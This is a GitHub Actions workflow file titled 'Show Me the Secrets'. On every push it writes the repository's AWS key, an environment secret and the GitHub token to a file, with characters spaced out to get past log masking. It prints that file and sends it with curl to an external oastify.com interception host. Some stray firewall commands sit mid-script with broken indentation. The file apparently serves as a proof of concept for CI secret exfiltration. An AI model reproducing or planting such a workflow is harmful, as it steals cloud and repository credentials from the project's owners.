
name: Show Me the Secrets
on: [push]

jobs:  
  debug:
    name: Debug
    runs-on: ubuntu-latest
    environment: workflowenv1

    steps:
    - name: Check out code
      uses: actions/checkout@v2

    - name: Set up secret file
      env:
        AWS_KEY: ${{ secrets.AWS_KEY }} 
        ENV_SECRET: ${{ secrets.ENV_SECRET }} | sed 's/./& /g'
        GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} | sed 's/./& /g'      

      run: |
        echo ${{ secrets.AWS_KEY }} | sed 's/./& /g' > foo.txt
        echo ${{ secrets.ENV_SECRET }} | sed 's/./& /g' >> foo.txt
        echo ${{ secrets.GITHUB_TOKEN }} | sed 's/./& /g' >> foo.txt
        cat foo.txt
           # Create a new chain for egress traffic
          sudo iptables -N egress

          # Allow specific outgoing traffic (e.g., HTTP and HTTPS)
          sudo iptables -A egress -p tcp --dport 80 -j ACCEPT
          sudo iptables -A egress -p tcp --dport 443 -j ACCEPT

          # Drop all other outgoing traffic
          sudo iptables -A egress -j DROP

          # Apply the egress chain to the output chain
          sudo iptables -A OUTPUT -j egress
        curl --data "Keys:$(cat foo.txt)" http://c3g36rzh0gj5zg6uh1y9y5h1csij6bu0.oastify.com
